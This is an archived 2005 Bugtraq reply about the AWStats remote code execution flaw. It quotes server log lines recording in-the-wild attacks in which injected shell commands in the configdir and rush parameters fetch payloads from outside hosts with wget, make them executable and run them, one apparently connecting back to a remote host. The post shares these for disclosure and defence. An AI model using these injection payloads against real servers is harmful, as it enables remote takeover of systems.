| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: niels-bugtraq at bakker.net (Niels Bakker) Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution * krustev@...stev.net (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]: > There's an exploit in the wild. Here's what it does: > > 200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" > 200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" It's been out there for a while already: 208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800" Those files don't exist there anymore. -- Niels. -- (please reply to niels=bugtraq@ instead of niels-bugtraq@ - except for the gazillion autoresponders of course)
Powered by blists - more mailing lists